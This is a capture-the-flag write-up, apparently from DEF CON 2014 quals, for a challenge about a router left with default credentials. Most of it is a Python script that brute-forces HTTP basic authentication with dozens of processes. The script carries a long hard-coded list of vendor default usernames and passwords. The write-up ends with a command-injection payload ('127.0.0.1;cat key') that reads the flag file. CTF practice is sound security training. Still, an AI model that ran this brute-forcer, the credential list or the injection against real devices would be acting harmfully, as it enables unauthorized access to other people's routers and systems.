Router is exposed to the internet with default credentials.
stage 1 : pass the id/pw check.
stage 2 : read the key by command injection? with vuln in the page.
---stage 1 exp.py--- (router id/pw list from routerpasswords.com)
#!/usr/bin/python
from urllib2 import *
from base64 import *
from multiprocessing import Queue, Process
a= [["Admin","admin"],["2Wire",""],["(none)","Wireless"],["volition","volition"],["Administrator","3ware"],["sysadm","anicust"],["debug","synnet"],["tech","tech"],["adm","(none)"],["debug","synnet"],["tech","tech"],["tech","tech"],["","ANYCOM"],["","ILMI"],["admin","(none)"],["n/a","PASSWORD"],["debug","synnet"],["tech","tech"],["adminttd","adminttd"],["admin","comcomcom"],["tech","tech"],["admin","admin"],["adm","(none)"],["tech","(none)"],["admin","synnet"],["tech","tech"],["root","(none)"],["admin","(none)"],["tech","(none)"],["admin","admin"],["admin","(none)"],["monitor","monitor"],["manager","manager"],["Root","(none)"],["admin","(none)"],["admin","(none)"],["n/a","PASSWORD"],["n/a","admin"],["n/a","(none)"],["(none)","admin"],["admin","password"],["User","Password"],["Administrator","admin"],["operator","(none)"],["security","security"],["3comcso","RIP000"],["(none)","admin"],["tech","tech"],["admin","(none)"],["admin","admin"],["root","(none)"],["admin","(none)"],["operator","(none)"],["admin","(none)"],["admin","admin"],["admin","(none)"],["n/a","(none)"],["Administrator","(none)"],["admin","admin"],["recovery","recovery"],["(none)","admin"],["admin","(none)"],["admin","(none)"],["n/a","(none)"],["admin","admin"],["admin","(none)"],["Administrator","(none)"],["tech","(none)"],["admin","admin"],["recovery","recovery"],["(none)","admin"],["(none)","1234admin"],["Type User: FORCE","(none)"],["n/a","(none)"],["n/a","(none)"],["admin","(none)"],["admin","(none)"],["none","0"],["(none)","0"],["(none)","0"],["admin","secure"],["admin","password"],["(none)","(none)"],["admin","password"],["admin","(none)"],["admin","password"],["admin","(none)"],["admin","(none)"],["n/a","secret"],["n/a","adtran"],["n/a","(none)"],["n/a","Password"],["n/a","PASSWORD"],["n/a","adtran"],["n/a","(none)"],["n/a","adtran"],["n/a","ADTRAN"],["n/a","(none)"],["n/a","adtran"],["admin","password"],["operator","(none)"],["admin","(none)"],["manager","friend"],["(blank)","(blank)"],["mtcl","(none)"],["kermit","kermit"],["dhs3mt","dhs3mt"],["at4400","at4400"],["mtch","mtch"],["mtcl","mtcl"],["root","letacla"],["dhs3pms","dhs3pms"],["adfexc","adfexc"],["client","client"],["install","llatsni"],["halt","tlah"],["n/a","1064"],["admin","switch"],["diag","switch"],["diag","switch"],["root","permit"],["(none)","admin"],["ftp_inst","pbxk1064"],["ftp_admi","kilo1987"],["ftp_oper","help1954"],["ftp_nmc","tuxalize"],["n/a","admin"],["manager","admin"],["root","(none)"],["manager","manager"],["manager","friend"],["Manager","friend"],["admin","admin"],["none","admin"],["admin","(none)"],["admin","admin"],["admin","(none)"],["admin","linga"],["admin","admin"],["root","(none)"],["root","root"],["root","root"],["root","root"],["user","user - (admin:cableroot)"],["admin","admin"],["n/a","admin"],["acc","acc"],["n/a","backdoor"],["n/a","TENmanUFactOryPOWER"],["device","device"],["apc","apc"],["apc","apc"],["(none)","public"],["n/a","password"],["n/a","admin"],["root","admin"],["root","alpine"],["IntraSwitch","Asante"],["IntraStack","Asante"],["superuser","(none)"],["admin","asante"],["admin","0000"],["n/a","atc123"],["",""],["(none)","admin"],["readonly","lucenttech2"],["n/a","ascend"],["root","ascend"],["(none)","3ascotel"],["admin","atlantis"],["admin","atlantis"],["admin","epicrouter"],["admin","epicrouter"],["admin","epicrouter"],["admin","epicrouter"],["admin","epicrouter"],["customer","none"],["DTA","TJM"],["DTA","TJM"],["DTA","TJM"],["admin","admin"],["admin","admin"],["admin","admin"],["admin","admin"],["admin","admin"],["n/a","admin"],["admin","admin"],["root","ROOT500"],["n/a","admin"],["craft","(none)"],["root","root"],["diag","danger"],["manuf","xxyyzz"],["diag","danger"],["manuf","xxyyzz"],["craft","crftpw"],["root","cms500"],["dadmin","dadmin01"],["root","pass"],["root","pass"],["root","pass"],["root","pass"],["root","pass"],["n/a","(none)"],["n/a","00000000"],["admin","admin"],["admin","epicrouter"],["n/a","NetICs"],["security","security"],["User","(none)"],["Manager","(none)"],["User","(none)"],["security","security"],["n/a","NetICs"],["root","n/a"],["(none)","MiniAP"],["n/a","admin"],["(blank)","(blank)"],["admin","(blank)"],["admin","admin"],["admin","admin"],["(none)","(none)"],["n/a","snmp-Trap"],["admin","bintec"],["admin","bintec"],["admin","bintec"],["admin","bintec"],["admin","articon"],["patrol","patrol"],["Administrator","the same all over"],["n/a","Master"],["n/a","laflaf"],["n/a","Helpdesk"],["n/a","Super"],["n/a","Master"],["n/a","laflaf"],["(none)","access"],["(none)","access"],["n/a","access"],["webadmin","webadmin"],["admin","admin"],["installer","installer"],["root","fivranne"],["admin","password"],["admin","password"],["root","(none)"],["admin","1234"],["netman","(none)"],["n/a","(none)"],["mediator","mediator"],["root","Mau'dib"],["Administrator","admin"],["admin","system"],["cellit","cellit"],["admin","admin"],["admin","password"],["admin","diamond"],["cmaker","cmaker"],["admin","changeme"],["netrangr","attack"],["bbsd-client","changeme2"],["bbsd-client","NULL"],["Administrator","changeme"],["root","attack"],["sa","(none)"],["(none)","public/private/secret"],["(none)","cisco"],["admin","admin"],["admin","default"],["Cisco","Cisco"],["guest","(none)"],["admin","cisco"],["cmaker","cmaker"],["(none)","Cisco"],["(none)","_Cisco"],["Cisco","Cisco"],["root","blender"],["hsa","hsadb"],["root","blender"],["wlse","wlsedb"],["root","Cisco"],["admin","admin"],["Administrator","admin"],["admin","admin"],["Administrator","admin"],["(blank)","(blank)"],["cisco","cisco"],["admin","epicrouter"],["administrator","administrator"],["anonymous","(none)"],["user","user"],["operator","operator"],["user","public"],["PFCUser","240653C9467E45"],["admin","admin"],["admin","(none)"],["admin","admin"],["n/a","epicrouter"],["n/a","admin"],["Administrator","admin"],["Administrator","admin"],["corecess","corecess"],["admin","(none)"],["root","root"],["cgadmin","cgadmin"],["super","surt"],["root","tslinux"],["root","tini"],["n/a","(none)"],["n/a","letmein"],["anonymous","any@"],["admin","admin"],["D-Link","D-Link"],["(none)","admin"],["admin","(none)"],["(none)","public"],["user","(none)"],["admin","(none)"],["admin","(none)"],["admin","(none)"],["admin","(none)"],["admin","admin"],["admin","(none)"],["n/a","admin"],["admin","(none)"],["admin","(none)"],["User","(none)"],["admin","admin"],["admin","(none)"],["user","(none)"],["admin","(none)"],["admin","(none)"],["admin","admin"],["admin","admin"],["admin","(none)"],["admin","admin"],["(none)","private"],["admin","admin"],["admin","(none)"],["admin","admin"],["user","(none)"],["admin","(none)"],["admin","admin"],["admin","admin"],["admin","admin"],["admin","(none)"],["admin","password"],["n/a","admin"],["admin","admin"],["admin","admin"],["admin","(none)"],["admin","admin"],["user","user"],["Admin","(none)"],["user","user"],["root","davox"],["admin","admin"],["davox","davox"],["sa","(none)"],["admin","password"],["root","calvin"],["admin","my_DEMARC"],["root","admin"],["MDaemon","MServer"],["admin","(none)"],["(none)","0000"],["","0000 This is also their standard for the W700 and"],["(none)","0000"],["PBX","PBX"],["NETWORK","NETWORK"],["NETOP","(none)"],["admin","michelangelo"],["user","password"],["n/a","BRIDGE"],["n/a","password"],["admin","admin"],["admin","admin"],["n/a","BRIDGE"],["n/a","password"],["n/a","BRIDGE"],["n/a","password"],["admin","admin"],["admin","(none)"],["admin","admin"],["(blank)","(blank)"],["draytek","1234"],["admin","1234"],["guest","(none)"],["admin","123"],["admin","epicrouter"],["admin","epicrouter"],["admin","epicrouter"],["(none)","admin"],["(none)","admin"],["n/a","admin"],["login","admin"],["login","password"],["n/a","admin"],["websecadm","changeme"],["netman","netman"],["netman","netman"],["(none)","help"],["n/a","(none)"],["n/a","4getme2"],["login","admin"],["(none)","hs7mwxkk"],["public","(none)"],["n/a","cisco"],["admin","netadmin"],["(none)","netadmin"],["admin","(none)"],["tiger","tiger123"],["1111","1111"],["admin","admin"],["supervisor","supervisor"],["operator","operator"],["n/a","(none)"],["anonymous","Exabyte"],["admin","(none)"],["root","default"],["admin","admin"],["n/a","password"],["admin","admin"],["admin","admin"],["admin","admin"],["admin","(none)"],["(none)","connect"],["admin","radius"],["admin","admin"],["n/a","Posterie"],["n/a","Posterie"],["Administrator","admin"],["Administrator","(none)"],["Administrator","admin"],["admin","isee"],["admin","admin"],["MGR","HPP187"],["MGR","HPP189"],["MGR","HPP196"],["MGR","INTX3"],["MGR","ITF3000"],["MGR","NETBASE"],["MGR","REGO"],["MGR","RJE"],["MGR","CONV"],["OPERATOR","SYS"],["OPERATOR","DISC"],["OPERATOR","SYSTEM"],["OPERATOR","SUPPORT"],["OPERATOR","COGNOS"],["PCUSER","SYS"],["RSBCMON","SYS"],["SPOOLMAN","HPOFFICE"],["WP","HPOFFICE"],["ADVMAIL","HPOFFICE DATA"],["ADVMAIL","HP"],["FIELD","SUPPORT"],["FIELD","MGR"],["FIELD","SERVICE"],["FIELD","MANAGER"],["FIELD","HPP187 SYS"],["FIELD","LOTUS"],["FIELD","HPWORD PUB"],["FIELD","HPONLY"],["HELLO","MANAGER.SYS"],["HELLO","MGR.SYS"],["HELLO","FIELD.SUPPORT"],["HELLO","OP.OPERATOR"],["MAIL","MAIL"],["MAIL","REMOTE"],["MAIL","TELESUP"],["MAIL","HPOFFICE"],["MAIL","MPE"],["MANAGER","TCH"],["MANAGER","SYS"],["MANAGER","SECURITY"],["MANAGER","ITF3000"],["MANAGER","HPOFFICE"],["MANAGER","COGNOS"],["MANAGER","TELESUP"],["MGR","SYS"],["MGR","CAROLIAN"],["MGR","VESOFT"],["MGR","XLSERVER"],["MGR","SECURITY"],["MGR","TELESUP"],["MGR","HPDESK"],["MGR","CCC"],["MGR","CNAS"],["MGR","WORD"],["MGR","COGNOS"],["MGR","ROBELLE"],["MGR","HPOFFICE"],["MGR","HPONLY"],["(none)","(none)"],["(none)","(none)"],["Anonymous","(none)"],["(none)","(none)"],["admin","hp.com"],["admin","admin"],["admin","(none)"],["TMAR#HWMT8007079","(none)"],["admin","admin"],["admin","admin"],["Administrator","pilou"],["n/a","(none)"],["n/a","ascend"],["n/a","(none)"],["n/a","admin"],["storwatch","specialist"],["n/a","R1QTPS"],["vt100","public"],["admin","password"],["admin","(none)"],["superadmin","secret"],["hscroot","abc123"],["admin","secure"],["root","(none)"],["n/a","admin"],["n/a","(none)"],["USERID","PASSW0RD"],["USERID","PASSW0RD"],["Administrator","admin"],["n/a","admin"],["admin","admin"],["admin","0000"],["Administrator","letmein"],["root","(none)"],["NICONEX","NICONEX"],["setup","setup"],["(none)","Intel"],["intel","intel"],["Guest","(none)"],["root","(none)"],["admin","(none)"],["admin","hello"],["admin","hello"],["intermec","intermec"],["SYSDBA","masterkey"],["n/a","(none)"],["operator","$chwarzepumpe"],["system","sys"],["admin","admin"],["n/a","admin"],["Administrator","admin"],["admin","operator"],["admin","operator"],["admin","epicrouter"],["JDE","JDE"],["admin","ironport"],["hydrasna","(none)"],["n/a","3477"],["n/a","8111"],["(none)","1234"],["(none)","(none)"],["PRODDTA","PRODDTA"],["n/a","00000000"],["netscreen","netscreen"],["n/a","PASSWORD"],["root","root"],["admin","admin"],["admin","(blank)"],["superuser","123456"],["admin","123456"],["admin","123"],["n/a","(none)"],["n/a","access"],["n/a","system"],["n/a","lantronix"],["sysadmin","PASS"],["login","access"],["n/a","admin"],["n/a","admin"],["n/a","access"],["n/a","(none)"],["n/a","(none)"],["n/a","(none)"],["n/a","(none)"],["n/a","(none)"],["(none)","jannie"],["admin","epicrouter"],["admin","admin"],["user","tivonpw"],["root","(none)"],["!root","(none)"],["!root","(none)"],["!root","(none)"],["n/a","(none)"],["n/a","admin"],["Administrator","admin"],["(none)","admin"],["admin","(none)"],["(none)","admin"],["admin","admin"],["admin","admin"],["n/a","admin"],["(none)","admin"],["(none)","admin"],["(none)","admin"],["admin","admin"],["comcast","1234"],["admin","admin"],["n/a","(none)"],["admin","admin"],["admin","admin"],["admin","admin"],["admin","admin"],["admin","admin"],["setup","changeme(exclamation)"],["(none)","0000"],["admin","epicrouter"],["super","super"],["(any 3 characters)","cascade"],["n/a","cascade"],["n/a","cascade"],["(any 3 characters)","cascade"],["n/a","cascade"],["n/a","cascade"],["admin","Ascend"],["root","ascend"],["readwrite","lucenttech1"],["readonly","lucenttech2"],["LUCENT01","UI-PSWD-01"],["LUCENT02","UI-PSWD-02"],["Administrator","(none)"],["admin","AitbISP4eCiG"],["bciim","bciimpw"],["bcim","bcimpw"],["bcms","bcmspw"],["bcnas","bcnaspw"],["blue","bluepw"],["browse","browsepw"],["browse","looker"],["craft","craft"],["craft","craftpw"],["cust","custpw"],["enquiry","enquirypw"],["field","support"],["inads","indspw"],["inads","inads"],["init","initpw"],["locate","locatepw"],["maint","maintpw"],["maint","rwmaint"],["nms","nmspw"],["rcust","rcustpw"],["support","supportpw"],["tech","field"],["admin","0"],["ami","(none)"],["n/a","(none)"],["scmadmin","scmchangeme"],["n/a","medion"],["Administrator","password"],["admin","1234"],["MICRO","RSX"],["MICRO","RSX"],["n/a","star"],["n/a","letmein"],["Administrator","admin"],["Administrator","admin"],["service","smile"],["root","default"],["mac","(none)"],["admin","epicrouter"],["admin","1234"],["root","root"],["admin","(none)"],["admin","(none)"],["operator","(none)"],["admin","(none)"],["n/a","SYSTEM"],["n/a","SYSTEM"],["(none)","admin"],["root","root"],["SYSADM","sysadm"],["system","password"],["n/a","(none)"],["cablecom","router"],["admin","motorola"],["admin","motorola"],["admin","motorola"],["cablecom","router"],["n/a","(none)"],["(blank)","(blank)"],["router","router"],["router","router"],["router","router"],["(none)","admin"],["admin","password"],["admin","admin"],["admin","admin123"],["GlobalAdmin","GlobalAdmin"],["n/a","(none)"],["(none)","1234"],["admin","password"],["comcast","1234"],["admin","password"],["admin","1234"],["admin","admin"],["admin","password"],["(none)","1234"],["super","5777364"],["superman","21241036"],["super","5777364"],["admin","password"],["admin","password"],["admin","password"],["admin","password"],["(none)","private"],["admin","password"],["admin","1234"],["admin","password"],["admin","password"],["admin","1234"],["admin","(none)"],["admin","password"],["admin","password"],["n/a","admin"],["n/a","password"],["n/a","(none)"],["admin","password"],["admin","password"],["admin","password"],["admin","password"],["netopia","netopia"],["admin","(none)"],["n/a","(none)"],["admin","noway"],["(none)","(none)"],["netopia","netopia"],["netscreen","netscreen"],["Administrator","(none)"],["admin","(none)"],["operator","(none)"],["Administrator","(none)"],["naadmin","naadmin"],["setup","setup"],["e500","e500changeme"],["e250","e250changeme"],["admin","password"],["guest","guest"],["admin","NetCache"],["(none)","admin"],["n/a","xdfk9874t3"],["n/a","xdfk9874t3"],["admin","(none)"],["admin","asd"],["disttech","4tas"],["maint","maint"],["mlusr","mlusr"],["admin","root"],["l2","l2"],["l3","l3"],["ro","ro"],["rw","rw"],["rwa","rwa"],["admin","setup"],["n/a","secure"],["login","0"],["login","1111"],["login","8429"],["spcl","0"],["service","smile"],["root","3ep5w2u"],["(none)","0"],["maint","ntacdmax"],["service","smile"],["disttech","4tas"],["maint","maint"],["ccrusr","ccrusr"],["n/a","(none)"],["service","smile"],["admin","setup"],["supervisor","PlsChgMe!"],["n/a","266344"],["266344","266344"],["n/a","(none)"],["n/a","(none)"],["supervisor","PlsChgMe1"],["vcr","NetVCR"],["(none)","password"],["(none)","9999"],["m1122","m1122"],["telecom","telecom"],["root","the 6 last digit of the MAC adress"],["admin","adslolitec"],["(none)","SUPER"],["(none)","SMDR"],["admin","changeme"],["n/a","(none)"],["admin","admin"],["admin","OCS"],["adminstat","OCS"],["adminview","OCS"],["adminuser","OCS"],["adminview","OCS"],["helpdesk","OCS"],["system/manager","sys/change_on_install"],["root","root"],["sys","uplink"],["cac_admin","cacadmin"],["admin","admin"],["admin","kont2004"],["Manager","Manager"],["sysadm","sysadm"],["write","private"],["debug","d.e.b.u.g"],["echo","echo"],["guest","guest"],["Manager","Manager"],["sysadm","sysadm"],["write","private"],["sysadm","sysadm"],["sysadm","sysadm"],["sysadm","sysadm"],["sysadm","sysadm"],["sysadm","sysadm"],["1500","and 2000 Series\""],["n/a","(none)"],["n/a","(none)"],["admin","1234"],["n/a","(none)"],["root","(none)"],["pmd","(none)"],["(none)","pento"],["admin","superuser"],["n/a","system"],["admin","password"],["PSEAdmin","$secure$"],["admin","mu"],["admin","microbusiness"],["user","password"],["admin","smallbusiness"],["admin","microbusiness"],["user","password"],["Administrator","admin"],["Polycom","SpIp"],["(none)","admin"],["(none)","(none)"],["(none)","(none)"],["(none)","(none)"],["","public"],["(none)","default"],["admin","epicrouter"],["admin","1234"],["admin","epicrouter"],["admin","admin"],["n/a","(none)"],["support","h179350"],["n/a","raidzone"],["admin","admin"],["admin","admin"],["lp","lp"],["radware","radware"],["sysadmin","password"],["sysadmin","password"],["(none)","password"],["n/a","password"],["admin","(none)"],["admin","password"],["wradmin","trancell"],["wradmin","trancell"],["admin","password"],["piranha","q"],["piranha","piranha"],["n/a","Col2ogro2"],["n/a","Col2ogro2"],["setup","changeme"],["teacher","password"],["temp1","password"],["admin","rmnetlm"],["admin2","changeme"],["adminstrator","changeme"],["deskalt","password"],["deskman","changeme"],["desknorm","password"],["deskres","password"],["guest","(none)"],["replicator","replicator"],["RMUser1","password"],["topicalt","password"],["topicnorm","password"],["topicres","password"],["admin","w2402"],["admin","epicrouter"],["root","1234"],["root","1234"],["admin","admin"],["public","public"],["n/a","(none)"],["admin","password"],["n/a","(none)"],["admin","(none)"],["admin","n/a"],["eng","engineer"],["op","op"],["op","operator"],["su","super"],["poll","tech"],["sysadmin","sysadmin"],["admin","pwp"],["tech","tech"],["superuser","admin"],["poll","tech"],["sysadmin","sysadmin"],["tech","tech"],["admin","pwp"],["eng","engineer"],["op","op"],["op","operator"],["su","super"],["admin","hagpolm1"],["n/a","(none)"],["GEN1","gen1"],["GEN2","gen2"],["ADMN","admn"],["n/a","SKY_FOX"],["n/a","SKY_FOX"],["n/a","(none)"],["root","(none)"],["(none)","sitecom"],["admin","admin"],["admin","admin"],["Administrator","ganteng"],["root","(none)"],["admin","(none)"],["admin","admin"],["admin","admin"],["(none)","smcadmin"],["n/a","smcadmin"],["Administrator","smcadmin"],["admin","barricade"],["smc","smcadmin"],["admin","smcadmin"],["(none)","smcadmin"],["admin","barricade"],["(none)","smcadmin"],["cusadmin","highspeed"],["smc","smcadmin"],["n/a","smcadmin"],["(none)","smcadmin"],["admin","(none)"],["aaa","often blank"],["admin","Protector"],["root","root"],["1.79 +","Multi"],["admin","password"],["root","admin"],["admin","conexant"],["(none)","admin"],["n/a","adminttd"],["admin","admin"],["admin","admin"],["admin","admin"],["admin","admin"],["(none)","admin"],["(none)","speedxess"],["admin","admin"],["admin","admin"],["root","changeme"],["Sweex","Mysweex"],["admin","xad$l#12"],["enable","(none)"],["target","password"],["Administrator","(none)"],["jagadmin","(none)"],["n/a","Symbol"],["n/a","Symbol"],["n/a","Symbol"],["n/a","Symbol"],["n/a","Symbol"],["n/a","Symbol"],["install","secret"],["(none)","TANDBERG"],["n/a","0000010023"],["Administrator","(none)"],["telco","telco"],["admin","1234"],["super.super","(none)"],["super.super","master"],["xbox","xbox"],["admin","password"],["n/a","(none)"],["admin","admin"],["admin","admin"],["(none)","(none)"],["(none)","(none)"],["tiara","tiaranet"],["admin","1234"],["tellabs","tellabs#1"],["root","admin_1"],["admin","extendnet"],["superman","talent"],["admin","admin"],["craft","(none)"],["(none)","enter"],["root","12345"],["admin","admin"],["cablemodem","robotics"],["admin","(blank) - Default IP is 192.168.123.254"],["admin","admin"],["n/a","password"],["n/a","(none)"],["admin","(none)"],["VTech","VTech"],["NAU","NAU"],["ADMINISTRATOR","ADMINISTRATOR"],["HTTP","HTTP"],["(none)","12345"],["root","admin"],["Any","12345"],["support","support"],["support","support"],["(none)","(none)"],["admin","changeme"],["admin","visual"],["admin","admin"],["guest","guest"],["(none)","166816"],["user","user"],["user","user"],["admin","admin"],["admin","admin"],["admin","admin"],["admin","admin"],["admin","admin"],["(blank)","(blank)"],["router","router"],["router","router"],["router","router"],["admin","admin"],["VTech","VTech"],["(blank)","(blank)"],["router","router"],["admin","admin"],["CSG","SESAME"],["admin","(none)"],["user","pass"],["admin","(none)"],["admin","password"],["CSG","SESAME"],["admin","sysAdmin"],["admin","password"],["root","wyse"],["VNC","winterm"],["(none)","Fireport"],["root","(none)"],["rapport","r@p8p0r+"],["n/a","password"],["super","super"],["1502","1502"],["super","super"],["n/a","(none)"],["n/a","(none)"],["xd","xd"],["admin","2222"],["admin","admin"],["admin","(none)"],["admin","22222"],["admin","admin"],["admin","admin"],["n/a","admin"],["admin","1111"],["admin","switch"],["diag","switch"],["admin","switch"],["admin","zoomadsl"],["n/a","system"],["n/a","access"],["n/a","system"],["n/a","access"],["n/a","access"],["n/a","access"],["n/a","system"],["n/a","(none)"],["admin","admin"],["root","admin"],["admin","1234"],["ZXDSL","ZXDSL"],["n/a","1234"],["root","1234"],["(none)","1234"],["(none)","1234"],["admin","1234"],["n/a","1234"],["1234","1234"],["webadmin","1234"],["admin","1234"],["admin","1234"],["n/a","(none)"],["admin","1234"],["admin","admin"],["n/a","1234"],["n/a","admin"]]
for i in a:
for j in range(2):
if i[j] == "(none)" or i[j]=="n/a":
i[j]=""
a=a
print "="*20+"go"+"="*20
url = "http://routarded_87f7837f50a5370771b9467d840c93c5.2014.shallweplayaga.me:5000"
q = Queue()
def run():
while True:
i = q.get()
idid = i[0]
pwpw = i[1]
go = b64encode(idid+":"+pwpw)
header = {'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Encoding':'gzip,deflate,sdch','Accept-Language':'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4,zh-TW;q=0.2,zh;q=0.2','Authorization':'basic '+go}
request = Request(url,'GET',header)
try:
data = urlopen(request)
if data.read():
print data.read()
print i
exit(0)
except HTTPError as e:
print e
for i in a:
q.put((i))
ps=[]
for i in range(30):
p = Process(target=run)
p.start()
ps.append(p)
----stage 2 (command injection)
thx to jinmo123
another solution
-> 127.0.0.1;cat key
LOLOLOLOLOL
CLEAR!
